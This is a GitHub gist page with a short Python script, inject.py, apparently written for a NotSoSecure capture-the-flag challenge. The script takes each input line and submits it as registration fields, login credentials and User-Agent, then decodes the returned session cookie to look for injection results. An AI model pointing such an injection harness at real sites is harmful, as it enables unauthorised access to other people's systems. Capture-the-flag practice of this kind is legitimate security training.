Skip to content

Instantly share code, notes, and snippets.

@balidani

balidani/inject.py Secret

Created October 26, 2013 00:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save balidani/04f79e3aa0086f080513 to your computer and use it in GitHub Desktop.
Save balidani/04f79e3aa0086f080513 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
inject.py
import requests
import sys
import binascii
from base64 import b64decode
reg_url = "http://ctf.notsosecure.com/71367217217126217712/register.php?regname=%s&regemail=%s&regpass1=%s&regpass2=%s"
login_url = "http://ctf.notsosecure.com/71367217217126217712/checklogin.php"
while True:
payload = raw_input()
data = {
"myusername": payload,
"mypassword": payload,
}
headers = {
'User-Agent': payload,
}
resp = requests.post(reg_url % (payload, payload, payload, payload), headers=headers)
# print resp.text.encode('ascii', 'ignore').split("\n")[58].split("<br>")[0].strip()
resp = requests.post(login_url, data=data, headers=headers)
# print resp.text.encode('ascii', 'ignore').split("\n")[56].strip()
if 'session_id' in resp.cookies:
print "Cookie: %s" % b64decode(resp.cookies['session_id'].replace("%3D", "="))
else:
print "Cookie: missing"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment